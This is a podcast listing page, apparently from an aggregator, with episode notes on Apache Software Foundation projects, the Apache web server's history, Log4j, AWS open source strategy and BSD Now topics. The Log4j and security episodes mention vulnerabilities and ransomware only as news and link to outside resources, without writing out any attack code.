horrifying. The Duckbill Group works for you, not AWS. We tailor recommendations to your business and we get to the point. Visit duckbillgroup.com to get started.Announcer: This has been a HumblePod production. Stay humble.

Groovy Podcast
Groovy Podcast, Episode 88 (S06E03)

Groovy Podcast

Play Episode Listen Later Oct 9, 2022 38:33


Groovy Podcast, Episode 88 (S06E03), from ApacheCon in New Orleans, LA. Ken Kousen, Paul King, Zach Klein, and Puneet Behl talk about the Groovy / Grails / Micronaut talks at the Apache Software Foundation's open source conference, October 2022.

The New Stack Podcast
The AWS Open Source Strategy

The New Stack Podcast

Play Episode Listen Later Oct 5, 2022 14:24


Amazon Web Services would not be what it is today without open source. "I think it starts with sustainability," said David Nalley, head of open source and marketing at AWS in an interview at the Open Source Summit in Dublin for The New Stack Makers. "And this really goes back to the origin of Amazon Web Services. AWS would not be what it is today without open source." Long-term support for open source is one of three pillars of the organization's open source strategy. AWS builds and innovates on top of open source and will maintain that approach for its innovation, customers, and the larger digital economy. "And that means that there's a long history of us benefiting from open source and investing in open source," Nalley said. "But ultimately, we're here for the long haul. We're going to continue making investments. We're going to increase our investments in open source." Customers' interest in open source is the second pillar of the AWS open source strategy. "We feel like we have to make investments on behalf of our customers," Nally said. "But the reality is our customers are choosing open source to run their workloads on." [sponsor_note slug="amazon-web-services-aws" ][/sponsor_note] The third pillar focuses on advocating for open source in the larger digital economy. Notable is how much AWS's presence in the market played a part in Paul Vixie's decision to join the company. Vixie, an Internet pioneer, is now vice president of security and an AWS distinguished engineer who was also interviewed for the New Stack Makers podcast at the Open Source Summit. Nalley has his recognizable importance in the community. Nalley is the president of the Apache Software Foundation, one of the world's most essential open source foundations. The importance of its three-pillar strategy shows in many of the projects that AWS supports. AWS recently donated $10 million to the Open Source Software Supply Chain Foundation, part of the Linux Foundation. AWS is a significant supporter of the Rust Foundation, which supports the Rust programming language and ecosystem. It puts a particular focus on maintainers that govern the project. Last month, Facebook unveiled the PyTorch Foundation that the Linux Foundation will manage. AWS is on the governing board.

TechCrunch Startups – Spoken Edition
With $17M in funding, Immerok launches cloud service for real-time streaming data

TechCrunch Startups – Spoken Edition

Play Episode Listen Later Oct 3, 2022 4:05


In 2011, the Apache Software Foundation released Flink, a high-throughput, low-latency engine for streaming various data types.

TechCrunch Startups – Spoken Edition
With $17M in funding, Immerok launches cloud service for real-time streaming data

TechCrunch Startups – Spoken Edition

Play Episode Listen Later Oct 3, 2022 4:05


In 2011, the Apache Software Foundation released Flink, a high-throughput, low-latency engine for streaming various data types.

Word Notes
Encore: Log4j vulnerability (noun)

Word Notes

Play Episode Listen Later Jul 5, 2022 8:46


An open source Java-based software tool available from the Apache Software Foundation designed to log security and performance information.  CyberWire Glossary link: https://thecyberwire.com/glossary/log4j Audio reference link: “CISA Director: The LOG4J Security Flaw Is the ‘Most Serious' She's Seen in Her Career,” by Eamon Javers (CNBC) and Jen Easterly (Cybersecurity and Infrastructure Security Director) YouTube, 20 December 20 2021.

FINOS Open Source in Fintech Podcast
Mission Critical Data, and Evaluating the Community in OSS Tech - Mick Semb Wever, The Apache Software Foundation

FINOS Open Source in Fintech Podcast

Play Episode Listen Later Jun 28, 2022 18:40


In this episode of the podcast, Grizz sits down with Mick Semb Wever, Principal Architect, The Apache Software Foundation for the Apache Cassandra Project, and Principal Architect at DataStax working in Professional Services. We talk about "Mission Critical Data, and Evaluating the Community in OSS Tech". Plus, we discuss if open source is up to the challenge of continuous delivery needed to keep up with the financial services industry, and how FSI companies can spend more time and resources on open source, and more. Mick's OSFF Talk - July 13 London: https://sched.co/13tCJ LinkedIn: https://www.linkedin.com/in/mick-semb-wever-91748720/ OSFF REGISTRATION IS OPEN FOR LONDON (13 JULY 22) (FINOS Members attend for FREEEEEE.... - osff@finos.org for more details) Open Source in Finance Forum London - https://events.linuxfoundation.org/open-source-finance-forum/ OSFF New York Call for Proposals - https://events.linuxfoundation.org/open-source-finance-forum-new-york/program/cfp/ Grizz's Info | https://www.linkedin.com/in/aarongriswold/ | grizz@finos.org ►► Visit FINOS www.finos.org ►► Get In Touch: info@finos.org

Orchestrate all the Things podcast: Connecting the Dots with George Anadiotis
Evaluating the streaming data ecosystem: StreamNative releases benchmark comparing Apache Pulsar to Apache Kafka. Featuring Chief Architect & Head of Cloud Engineering Addison Higham

Orchestrate all the Things podcast: Connecting the Dots with George Anadiotis

Play Episode Listen Later Apr 7, 2022 30:23


Processing data in real-time is on the rise. The streaming analytics market (which depending on definitions, may just be one segment of the streaming data market) is projected to grow from $15.4 billion in 2021 to $50.1 billion in 2026, at a Compound Annual Growth Rate (CAGR) of 26.5% during the forecast period as per Markets and Markets. A multitude of streaming data alternatives, each with its own focus and approach, has emerged in the last few years. One of those alternatives is Apache Pulsar. In 2021, Pulsar ranked as a Top 5 Apache Software Foundation project and surpassed Apache Kafka in monthly active contributors. In another episode in the data streaming saga, StreamNative just released a report comparing Apache Pulsar to Apache Kafka in terms of performance benchmarks. We caught up with StreamNative Chief Architect & Head of Cloud Engineering Addison Higham to discuss the report's findings, as well as the bigger picture in data streaming. Article published on VentureBeat

USB our Guest Flash Briefing
Log4shell, Log4j exploit or Log4what, is that a new crossfit trend?

USB our Guest Flash Briefing

Play Episode Listen Later Feb 19, 2022 6:10


Today's episode covers the vulnerability affecting Java logging package, Log4j. This episode took a little longer to make than expected due to its complexity. Please see links below used to create the episode. TryHackMe's Solar, exploiting log4j https://tryhackme.com/room/solar The Log4J Vulnerability Will Haunt the Internet for Years https://www.wired.com/story/log4j-log4shell/ Huntress Log4Shell Vulnerability Tester https://log4shell.huntress.com/ Apache logging services https://logging.apache.org/ The Apache Software Foundation https://www.apache.org/ USB our Guest - Episode 22 Updates - https://anchor.fm/usbog/episodes/Software-Updates-emgnsh Log4j Attack surface - https://github.com/YfryTchsGD/Log4jAttackSurface Log4j - Apache Log4j Security Vulnerabilities - https://logging.apache.org/log4j/2.x/security.html JDBC Appender https://logging.apache.org/log4j/2.x/manual/appenders.html#JDBCAppender Apache Log4j Security Vulnerabilities https://logging.apache.org/log4j/2.x/security.html What is JDBC? https://www.ibm.com/docs/en/informix-servers/12.10?topic=started-what-is-jdbc Lesson: Overview of JNDI https://docs.oracle.com/javase/tutorial/jndi/overview/index.html W3Schools - Addressing https://www.w3.org/Addressing/URL/uri-spec.html Amazon Affiliate link - https://amzn.to/3rpF5KI --- Send in a voice message: https://anchor.fm/usbog/message

Engenharia de Dados [Cast]
Apache Kafka é um Banco de Dados Relacional?

Engenharia de Dados [Cast]

Play Episode Listen Later Feb 14, 2022 53:57


O Apache Kafka é uma plataforma de streaming de dados, capaz de ingerir e processar milhões de eventos por segundo entretanto, alguns pontos são importantes e normalmente não temos muitas explicações sobre os mesmos, como:O Apache Kafka é um Banco de DadosTransações no Apache KafkaArmazenamento e Processamento DesacopladoComparação de Banco de Dados vs. Apache KafkaEsse episódio irá de uma vez por todas desmistificar o Apache Kafka e tirar todas as suas dúvidas referentes a seus pontos fortes e fracos e como você pode extrair o melhor dessa tecnologia open-source da Apache Software Foundation. Luan Moreno = https://www.linkedin.com/in/luanmoreno/

Sotto Attacco | Cybersecurity
L'apocalisse nucleare del web

Sotto Attacco | Cybersecurity

Play Episode Listen Later Feb 14, 2022 14:05


Il 24 novembre 2021si diffonde un allarme mondiale. Basta un semplice messaggio, che da Hangzhou, in Cina, arriva a Forest Hill, Maryland, USA. Lì vive John, tipico americano medio, specialista di informatica, che sta andando a lavoro alla Apache Software Foundation. In ufficio apre il suo laptop, controlla la posta e vede un messaggio. Quel messaggio. John legge, e apprende che i tecnici cinesi di Alibaba - i mittenti - hanno scoperto una falla in una libreria, Log4J. Si tratta di un tool open source utilizzatissimo, scritto con linguaggio Java proprio là dove lavora lui. I cinesi lo informano di averla scoperta in Minecraft, il videogioco più venduto al mondo. E' una vulnerabilità di nome Log4Shell. John legge e capisce che il problema è grave. Molto grave. C'è chi lo definisce l'apocalisse nucleare del web.Ma perché lo chiamano così, Log4J? Perché è così devastante? Buon ascolto!

Radio IT
SOPHOS - L'apocalisse nucleare del web

Radio IT

Play Episode Listen Later Feb 14, 2022 14:06


Il 24 novembre 2021si diffonde un allarme mondiale. Basta un semplice messaggio, che da Hangzhou, in Cina, arriva a Forest Hill, Maryland, USA. Lì vive John, tipico americano medio, specialista di informatica, che sta andando a lavoro alla Apache Software Foundation. In ufficio apre il suo laptop, controlla la posta e vede un messaggio. Quel messaggio.John legge, e apprende che i tecnici cinesi di Alibaba - i mittenti - hanno scoperto una falla in una libreria, Log4J. Si tratta di un tool open source utilizzatissimo, scritto con linguaggio Java proprio là dove lavora lui. I cinesi lo informano di averla scoperta in Minecraft, il videogioco più venduto al mondo. E' una vulnerabilità di nome Log4Shell. John legge e capisce che il problema è grave. Molto grave. C'è chi lo definisce l'apocalisse nucleare del web.Ma perché lo chiamano così, Log4J? Perché è così devastante?

Risky Business
Risky Business #651 -- Russia's ransomware diplomacy

Risky Business

Play Episode Listen Later Jan 19, 2022


On this week's show Patrick Gray, Adam Boileau and Dmitri Alperovitch discuss the week's security news, including: Russia arrests REvil crew Ukraine government hit in messy hacks White House hosts open source pow-wow, but is it pointless? US cyber reporting law will come back from the dead Report: Israeli police targeted activists with NSO but without warrants Much, much more This week's sponsor interview is with HD Moore, the founder of Rumble. We're talking through what how he and his team helped customers respond to the log4j drama. They quickly added the capability to scan customer's environments for log4shell-affected tech. When asset discovery meets rapid vuln response! Links to everything that we discussed are below and you can follow Patrick, Dmitri or Adam on Twitter if that's your thing. Show notes Russia arrests ransomware gang responsible for high-profile cyberattacks Celebrations over REvil ransomware arrests in Russia may be premature | The Daily Swig Ransomware gang behind attacks on 50 companies arrested in Ukraine - The Record by Recorded Future Europol takes down VPNLab, a service used by ransomware gangs - The Record by Recorded Future Albuquerque schools are having a cybersecurity snow day—and they aren't alone - The Record by Recorded Future What We Know and Don't Know about the Cyberattacks Against Ukraine - (updated) Dozens of Computers in Ukraine Wiped with Destructive Malware in Coordinated Attack Belarus: Cyber upstart, or Russian staging ground? White House hosts open-source software security summit in light of expansive Log4j flaw Apache Software Foundation warns its patching efforts are being undercut by use of end-of-life software | The Daily Swig GitLab shifts left to patch high-impact vulnerabilities | The Daily Swig Cyber incident reporting backers pledge to resume push - The Record by Recorded Future Israeli police used spyware to hack its own citizens, a report says : NPR El Salvador journalists hacked with NSO's Pegasus spyware - The Record by Recorded Future Cyber Command ties hacking group to Iranian intelligence - The Record by Recorded Future Earth Lusca threat actor targets governments and cryptocurrency companies alike - The Record by Recorded Future North Korea stole a record $400 million in cryptocurrency last year, researchers say Crypto.com Says Alleged $15 Million Hack Was Just an 'Incident' Who is the Network Access Broker ‘Wazawaka?' – Krebs on Security New Chrome security measure aims to curtail an entire class of Web attack | Ars Technica EA blames support staff for recent hacks of high-profile FIFA accounts - The Record by Recorded Future Researchers discover ‘extremely easy' 2FA bypass in Box cloud management software | The Daily Swig Introducing vAPI – an open source lab environment to learn about API security | The Daily Swig

More In Common Podcast
Genius is Not Perfect /// Ben and Fitz /// EP146:Part2

More In Common Podcast

Play Episode Listen Later Jan 13, 2022 28:49


No matter how much effort you put into something, it's never done alone. This applies to everyone, including the smartest or most athletic. A genius doesn't create without supplies, funding, or assistance to contribute to their field of study. Like an athlete doesn't get to show their skills if the structure of sport doesn't exist.  This is highlighted by Ben and Fitz in this Part 2 episode of their conversation. They talk about the Genius Myth and the importance of recognizing it when building highly collaborative and effective teams.   ///   Brian (Fitz) is the Founder and CTO of Tock, and he started Google's Chicago engineering office in 2005. An open-source contributor for over 13 years, Brian was the engineering manager for several Google products, and is a member of the Apache Software Foundation, a former engineer at Apple and CollabNet, and a Subversion developer,   Ben is a co-founder & author of Subversion, a popular version-control tool to help programmers collaborate. He also co-authored the main O'Reilly manual for the software. He is currently the engineering Site Lead for Google's Chicago office, having joined Google in 2005 as one of the first two engineers in Chicago. He manages multiple teams working on Google's Search-serving infrastructure.   Together they have collaborated on multiple talks and books regarding the social challenges of software development. They have given dozens of talks at conferences (many viewable on youtube), and authored a popular O'Reilly book on the subject: Debugging Teams: Better Productivity through Collaboration.   /// Topics we discuss:   PrivilegeThe relative nature of privilege Seeing privilege Their Book - Debugging TeamsGenius Myth Working together in a creative space Peter Principle Understanding others Pursue what makes sense for each   References: ORD Camp Crucial Conversations H.A.L.T. - Hungry, Angry, Lonely, Tired Free Book - Debugging Teams Nikola Tesla and Thomas Edison Peter Principle   Credits:   Music: Main Theme: "Eaze Does It" by Shye Eaze and DJ Rufbeats, a More In Common Podcast Exclusive. All music created by DJ Rufbeats

Word Notes
Log4j vulnerability (noun)

Word Notes

Play Episode Listen Later Jan 11, 2022 8:46


An open source Java-based software tool available from the Apache Software Foundation designed to log security and performance information. 

GreyBeards on Storage
123: GreyBeards talk data analytics with Sean Owen, Apache Spark committee/PMC member & Databricks, lead data scientist

GreyBeards on Storage

Play Episode Listen Later Sep 14, 2021 43:33


The GreyBeards move up the stack this month with a talk on big data and data analytics with Sean Owen (@sean_r_owen), Data Science lead at Databricks and Apache Spark committee and PMC member. The focus of the talk was on Apache Spark. Spark is an Apache Software Foundation open-source data analytics project and has been … Continue reading "123: GreyBeards talk data analytics with Sean Owen, Apache Spark committee/PMC member & Databricks, lead data scientist"

AWS Developers Podcast
Episode 002 - Open Source with David Nalley

AWS Developers Podcast

Play Episode Listen Later Jun 8, 2021 26:10


In this episode Dave and Emily talk to David Nalley, a Principal Advocate at AWS for Open Source, and President of the Apache Software Foundation. David has been involved in open-source projects for decades, and humbly shares the lessons he has learned. David Nalley on Twitter: twitter.com/ke4qqq Apache Software Foundation on Twitter: https://twitter.com/TheASF Innovating with Rust: https://aws.amazon.com/blogs/opensource/innovating-with-rust/ Connect with Us on Twitter: Emily on Twitter: twitter.com/editingemily Dave on Twitter: twitter.com/thedavedev

Recruiting is a Cluster
Episode 1 - Philip Gollucci

Recruiting is a Cluster

Play Episode Listen Later Sep 26, 2020 51:32


Philip Gollucci, former VP of Infrastructure at the Apache Software Foundation, joins the Recruiting is a Cluster podcast to share a must-listen story about a six-stage interview process for a Data Scientist. He was asked to conduct the final interview and technical screen where a candidate used a “ringer.” Listen to the hilarity that ensues as the actual candidate shows up for their first day and cannot use basic Microsoft Office products. Philip shares his thoughts on improving the overall hiring process and preventing mistakes like this from happening in the future. You do not want to miss this absurd story, or the valuable advice he shares on recruiting top-tier technical talent. To contact Adrian Russo: adrian@recruitlocator.com To contact Philip Gollucci: pgollucci@p6m7g8.com RecruitLocator: https://www.recruitlocator.com AWS CDK: https://cdk.dev Lucky  Dog Animal Rescue: https://www.luckydoganimalrescue.org/home

The History of Computing
The Apache Web Server

The History of Computing

Play Episode Listen Later Oct 29, 2019 12:52


Welcome to the History of Computing Podcast, where we explore the history of information technology. Because understanding the past prepares us for the innovations of the future! Today we're going to cover one of the most important and widely distributed server platforms ever: The Apache Web Server. Today, Apache servers account for around 44% of the 1.7 Billion web sites on the Internet. But at one point it was zero. And this is crazy, it's down from over 70% in 2010. Tim Berners-Lee had put the first website up in 1991 and what we now know as the web was slowly growing. In 1994 and begins with the National Center for Supercomputing Applications, University of Illinois, Urbana-Champaign. Yup, NCSA is also the organization that gave us telnet and Mosaic, the web browser that would evolve into Netscape. After Rob leaves NCSA, the HTTPdaemon goes a little, um, dormant in development. The distress had forked and the extensions and bug fixes needed to get merged into a common distribution. Apache is a free and open source web server that was initially created by Robert McCool and written in C in 1995, the same year Berners-Lee coined the term World Wide Web. You can't make that name up. I'd always pictured him as a cheetah wearing sunglasses. Who knew that he'd build a tool that would host half of the web sites in the world. A tool that would go on to be built into plenty of computers so they can spin up sharing services. Times have changed since 1995. Originally the name was supposedly a cute name referring to a Patchy server, given that it was based on lots of existing patches of craptostic code from NCSA. So it was initially based on NCSA HTTPd is still alive and well all the way up to the configuration files. For example, on a Mac these are stored at /private/etc/apache2/httpd.conf. The original Apache group consisted of * Brian Behlendorf * Roy T. Fielding * Rob Hartill * David Robinson * Cliff Skolnick * Randy Terbush * Robert S. Thau * Andrew Wilson And there were additional contributions from Eric Hagberg, Frank Peters, and Nicolas Pioch. Within a year of that first shipping, Apache had become the most popular web server on the internet. The distributions and sites continued to grow to the point that they formed the Apache Software Foundation that would give financial, legal, and organizational support for Apache. They even started bringing other open source projects under that umbrella. Projects like Tomcat. And the distributions of Apache grew. Mod_ssl, which brought the first SSL functionality to Apache 1.17, was released in 1998. And it grew. The Apache Foundation came in 1999 to make sure the project outlived the participants and bring other tools under the umbrella. The first conference, ApacheCon came in 2000. Douglas Adams was there. I was not. There were 17 million web sites at the time. The number of web sites hosted on Apache servers continued to rise. Apache 2 was released in 2004. The number of web sites hosted on Apache servers continued to rise. By 2009, Apache was hosting over 100 million websites. By 2013 Apache had added that it was named “out of a respect for the Native American Indian tribe of Apache”. The history isn't the only thing that was rewritten. Apache itself was rewritten and is now distributed as Apache 2.0. there were over 670 million web sites by then. And we hit 1 billion sites in 2014. I can't help but wonder what percentage collections of fart jokes. Probably not nearly enough. But an estimated 75% are inactive sites. The job of a web server is to serve web pages on the internet. Those were initially flat HTML files but have gone on to include CGI, PHP, Python, Java, Javascript, and others. A web browser is then used to interpret those files. They access the .html or .htm (or other one of the other many file types that now exist) file and it opens a page and then loads the text, images, included files, and processes any scripts. Both use the http protocol; thus the URL begins with http or https if the site is being hosted over ssl. Apache is responsible for providing the access to those pages over that protocol. The way the scripts are interpreted is through Mods. These include mod_php, mod_python, mod_perl, etc. The modular nature of Apache makes it infinitely extensible. OK, maybe not infinitely. Nothing's really infinite. But the Loadable Dynamic Modules do make the system more extensible. For example, you can easily get TLS/SSL using mod_ssl. The great thing about Apache and its mods are that anyone can adapt the server for generic uses and they allow you to get into some pretty really specific needs. And the server as well as each of those mods has its source code available on the Interwebs. So if it doesn't do exactly what you want, you can conform the server to your specific needs. For example, if you wanna' hate life, there's a mod for FTP. Out of the box, Apache logs connections, includes a generic expression parser, supports webdav and cgi, can support Embedded Perl, PHP and Lua scripting, can be configured for public_html per-user web-page, supports htaccess to limit access to various directories as one of a few authorization access controls and allows for very in depth custom logging and log rotation. Those logs include things like the name and IP address of a host as well as geolocations. Can rewrite headers, URLs, and content. It's also simple to enable proxies Apache, along with MySQL, PHP and Linux became so popular that the term LAMP was coined, short for those products. The prevalence allowed the web development community to build hundreds or thousands of tools on top of Apache through the 90s and 2000s, including popular Content Management Systems, or CMS for short, such as Wordpress, Mamba, and Joomla. * Auto-indexing and content negotiation * Reverse proxy with caching * Multiple load balancing mechanisms * Fault tolerance and Failover with automatic recovery * WebSocket, FastCGI, SCGI, AJP and uWSGI support with caching * Dynamic configuration * Name- and IP address-based virtual servers * gzip compression and decompression * Server Side Includes * User and Session tracking * Generic expression parser * Real-time status views * XML support Today we have several web servers to choose from. Engine-X, spelled Nginx, is a newer web server that was initially released in 2004. Apache uses a thread per connection and so can only process the number of threads available; by default 10,000 in Linux and macOS. NGINX doesn't use threads so can scale differently, and is used by companies like AirBNB, Hulu, Netflix, and Pinterest. That 10,000 limit is easily controlled using concurrent connection limiting, request processing rate limiting, or bandwidth throttling. You can also scale with some serious load balancing and in-band health checks or with one of the many load balancing options. Having said that, Baidu.com, Apple.com, Adobe.com, and PayPal.com - all Apache. We also have other web servers provided by cloud services like Cloudflare and Google slowly increasing in popularity. Tomcat is another web server. But Tomcat is almost exclusively used to run various Java servers, servelets, EL, webscokets, etc. Today, each of the open source projects under the Apache Foundation has a Project Management committee. These provide direction and management of the projects. New members are added when someone who contributes a lot to the project get nominated to be a contributor and then a vote is held requiring unanimous support. Commits require three yes votes with no no votes. It's all ridiculously efficient in a very open source hacker kinda' way. The Apache server's impact on the open-source software community has been profound. It iis partly explained by the unique license from the Apache Software Foundation. The license was in fact written to protect the creators of Apache while giving access to the source code for others to hack away at it. The Apache License 1.1 was approved in 2000 and removed the requirement to attribute the use of the license in advertisements of software. Version two of the license came in 2004, which made the license easier for projects that weren't from the Apache Foundation. This made it easier for GPL compatibility, and using a reference for the whole project rather than attributing software in every file. The open source nature of Apache was critical to the growth of the web as we know it today. There were other projects to build web servers for sure. Heck, there were other protocols, like Gopher. But many died because of stringent licensing policies. Gopher did great until the University of Minnesota decided to charge for it. Then everyone realized it didn't have nearly as good of graphics as other web servers. Today the web is one of the single largest growth engines of the global economy. And much of that is owed to Apache. So thanks Apache, for helping us to alleviate a little of the suffering of the human condition for all creatures of the world. By the way, did you know you can buy hamster wheels on the web. Or cat food. Or flea meds for the dog. Speaking of which, I better get back to my chores. Thanks for taking time out of your busy schedule to listen! You probably get to your chores as well though. Sorry if I got you in trouble. But hey, thanks for tuning in to another episode of the History of Computing Podcast. We're lucky to have you. Have a great day!

Drill to Detail
Drill to Detail Ep.44 'Pandas, Apache Arrow and In-Memory Analytics' With Special Guest Wes McKinney

Drill to Detail

Play Episode Listen Later Dec 8, 2017 46:31


Mark is joined in this episode of Drill to Detail by Wes McKinney, to talk about the origins of the Python Pandas open-source package for data analysis and his subsequent work as a contributor to the Kudu (incubating) and Parquet projects within the Apache Software Foundation and Arrow, an in-memory data structure specification for use by engineers building data systems and the de-facto standard for columnar in-memory processing and interchange.

BSD Now
214: The history of man, kind

BSD Now

Play Episode Listen Later Oct 4, 2017 90:20


The costs of open sourcing a project are explored, we discover why PS4 downloads are so slow, delve into the history of UNIX man pages, and more. This episode was brought to you by Headlines The Cost Of Open Sourcing Your Project (https://meshedinsights.com/2016/09/20/open-source-unlikely-to-be-abandonware/) Accusing a company of “dumping” their project as open source is probably misplaced – it's an expensive business no-one would do frivolously. If you see an active move to change software licensing or governance, it's likely someone is paying for it and thus could justify the expense to an executive. A Little History Some case study cameos may help. From 2004 onwards, Sun Microsystems had a policy of all its software moving to open source. The company migrated almost all products to open source licenses, and had varying degrees of success engaging communities around the various projects, largely related to the outlooks of the product management and Sun developers for the project. Sun occasionally received requests to make older, retired products open source. For example, Sun acquired a company called Lighthouse Design which created a respected suite of office productivity software for Steve Jobs' NeXT platform. Strategy changes meant that software headed for the vault (while Jonathan Schwartz, a founder of Lighthouse, headed for the executive suite). Members of the public asked if Sun would open source some of this software, but these requests were declined because there was no business unit willing to fund the move. When Sun was later bought by Oracle, a number of those projects that had been made open source were abandoned. “Abandoning” software doesn't mean leaving it for others; it means simply walking away from wherever you left it. In the case of Sun's popular identity middleware products, that meant Oracle let the staff go and tried to migrate customers to other products, while remaining silent in public on the future of the project. But the code was already open source, so the user community was able to pick up the pieces and carry on, with help from Forgerock. It costs a lot of money to open source a mature piece of commercial software, even if all you are doing is “throwing a tarball over the wall”. That's why companies abandoning software they no longer care about so rarely make it open source, and those abandoning open source projects rarely move them to new homes that benefit others. If all you have thought about is the eventual outcome, you may be surprised how expensive it is to get there. Costs include: For throwing a tarball over the wall: Legal clearance. Having the right to use the software is not the same as giving everyone in the world an unrestricted right to use it and create derivatives. Checking every line of code to make sure you have the rights necessary to release under an OSI-approved license is a big task requiring high-value employees on the “liberation team”. That includes both developers and lawyers; neither come cheap. Repackaging. To pass it to others, a self-contained package containing all necessary source code, build scripts and non-public source and tool dependencies has to be created since it is quite unlikely to exist internally. Again, the liberation team will need your best developers. Preserving provenance. Just because you have confidence that you have the rights to the code, that doesn't mean anyone else will. The version control system probably contains much of the information that gives confidence about who wrote which code, so the repackaging needs to also include a way to migrate the commit information. Code cleaning. The file headers will hopefully include origin information but the liberation team had better check. They also need to check the comments for libel and profanities, not to mention trade secrets (especially those from third parties) and other IP issues. For a sustainable project, all the above plus: Compliance with host governance. It is a fantastic idea to move your project to a host like Apache, Conservancy, Public Software and so on. But doing so requires preparatory work. As a minimum you will need to negotiate with the new host organisation, and they may well need you to satisfy their process requirements. Paperwork obviously, but also the code may need conforming copyright statements and more. That's more work for your liberation team. Migration of rights. Your code has an existing community who will need to migrate to your new host. That includes your staff – they are community too! They will need commit rights, governance rights, social media rights and more. Your liberation team will need your community manager, obviously, but may also need HR input. Endowment. Keeping your project alive will take money. It's all been coming from you up to this point, but if you simply walk away before the financial burden has been accepted by the new community and hosts there may be a problem. You should consider making an endowment to your new host to pay for their migration costs plus the cost of hosting the community for at least a year. Marketing. Explaining the move you are making, the reasons why you are making it and the benefits for you and the community is important. If you don't do it, there are plenty of trolls around who will do it for you. Creating a news blog post and an FAQ — the minimum effort necessary — really does take someone experienced and you'll want to add such a person to your liberation team. Motivations There has to be some commercial reason that makes the time, effort and thus expense worth incurring. Some examples of motivations include: Market Strategy. An increasing number of companies are choosing to create substantial, openly-governed open source communities around software that contributes to their business. An open multi-stakeholder co-developer community is an excellent vehicle for innovation at the lowest cost to all involved. As long as your market strategy doesn't require creating artificial scarcity. Contract with a third party. While the owner of the code may no longer be interested, there may be one or more parties to which they owe a contractual responsibility. Rather than breaching that contract, or buying it out, a move to open source may be better. Some sources suggest a contractual obligation to IBM was the reason Oracle abandoned OpenOffice.org by moving it over to the Apache Software Foundation for example. Larger dependent ecosystem. You may have no further use for the code itself, but you may well have other parts of your business which depend on it. If they are willing to collectively fund development you might consider an “inner source” strategy which will save you many of the costs above. But the best way to proceed may well be to open the code so your teams and those in other companies can fund the code. Internal politics. From the outside, corporations look monolithic, but from the inside it becomes clear they are a microcosm of the market in which they exist. As a result, they have political machinations that may be addressed by open source. One of Oracle's motivations for moving NetBeans to Apache seems to have been political. Despite multiple internal groups needing it to exist, the code was not generating enough direct revenue to satisfy successive executive owners, who allegedly tried to abandon it on more than one occasion. Donating it to Apache meant that couldn't happen again. None of this is to say a move to open source guarantees the success of a project. A “Field of Dreams” strategy only works in the movies, after all. But while it may be tempting to look at a failed corporate liberation and describe it as “abandonware”, chances are it was intended as nothing of the kind. Why PS4 downloads are so slow (https://www.snellman.net/blog/archive/2017-08-19-slow-ps4-downloads/) From the blog that brought us “The origins of XXX as FIXME (https://www.snellman.net/blog/archive/2017-04-17-xxx-fixme/)” and “The mystery of the hanging S3 downloads (https://www.snellman.net/blog/archive/2017-07-20-s3-mystery/)”, this week it is: “Why are PS4 downloads so slow?” Game downloads on PS4 have a reputation of being very slow, with many people reporting downloads being an order of magnitude faster on Steam or Xbox. This had long been on my list of things to look into, but at a pretty low priority. After all, the PS4 operating system is based on a reasonably modern FreeBSD (9.0), so there should not be any crippling issues in the TCP stack. The implication is that the problem is something boring, like an inadequately dimensioned CDN. But then I heard that people were successfully using local HTTP proxies as a workaround. It should be pretty rare for that to actually help with download speeds, which made this sound like a much more interesting problem. Before running any experiments, it's good to have a mental model of how the thing we're testing works, and where the problems might be. If nothing else, it will guide the initial experiment design. The speed of a steady-state TCP connection is basically defined by three numbers. The amount of data the client is will to receive on a single round-trip (TCP receive window), the amount of data the server is willing to send on a single round-trip (TCP congestion window), and the round trip latency between the client and the server (RTT). To a first approximation, the connection speed will be: speed = min(rwin, cwin) / RTT With this model, how could a proxy speed up the connection? The speed through the proxy should be the minimum of the speed between the client and proxy, and the proxy and server. It should only possibly be slower With a local proxy the client-proxy RTT will be very low; that connection is almost guaranteed to be the faster one. The improvement will have to be from the server-proxy connection being somehow better than the direct client-server one. The RTT will not change, so there are just two options: either the client has a much smaller receive window than the proxy, or the client is somehow causing the server's congestion window to decrease. (E.g. the client is randomly dropping received packets, while the proxy isn't). After setting up a test rig, where the PS4's connection was bridged through a linux box so packets could be captured, and artificial latency could be added, some interested results came up: The differences in receive windows at different times are striking. And more important, the changes in the receive windows correspond very well to specific things I did on the PS4 When the download was started, the game Styx: Shards of Darkness was running in the background (just idling in the title screen). The download was limited by a receive window of under 7kB. This is an incredibly low value; it's basically going to cause the downloads to take 100 times longer than they should. And this was not a coincidence, whenever that game was running, the receive window would be that low. Having an app running (e.g. Netflix, Spotify) limited the receive window to 128kB, for about a 5x reduction in potential download speed. Moving apps, games, or the download window to the foreground or background didn't have any effect on the receive window. Playing an online match in a networked game (Dreadnought) caused the receive window to be artificially limited to 7kB. I ran a speedtest at a time when downloads were limited to 7kB receive window. It got a decent receive window of over 400kB; the conclusion is that the artificial receive window limit appears to only apply to PSN downloads. When a game was started (causing the previously running game to be stopped automatically), the receive window could increase to 650kB for a very brief period of time. Basically it appears that the receive window gets unclamped when the old game stops, and then clamped again a few seconds later when the new game actually starts up. I did a few more test runs, and all of them seemed to support the above findings. The only additional information from that testing is that the rest mode behavior was dependent on the PS4 settings. Originally I had it set up to suspend apps when in rest mode. If that setting was disabled, the apps would be closed when entering in rest mode, and the downloads would proceed at full speed. The PS4 doesn't make it very obvious exactly what programs are running. For games, the interaction model is that opening a new game closes the previously running one. This is not how other apps work; they remain in the background indefinitely until you explicitly close them. So, FreeBSD and its network stack are not to blame Sony used a poor method to try to keep downloads from interfering with your gameplay The impact of changing the receive window is highly dependant upon RTT, so it doesn't work as evenly as actual traffic shaping or queueing would. An interesting deep dive, it is well worth reading the full article and checking out the graphs *** OpenSSH 7.6 Released (http://www.openssh.com/releasenotes.html#7.6) From the release notes: This release includes a number of changes that may affect existing configurations: ssh(1): delete SSH protocol version 1 support, associated configuration options and documentation. ssh(1)/sshd(8): remove support for the hmac-ripemd160 MAC. ssh(1)/sshd(8): remove support for the arcfour, blowfish and CAST Refuse RSA keys

Free as in Freedom
0x57: Support Conservancy Now!

Free as in Freedom

Play Episode Listen Later Nov 24, 2015 26:10


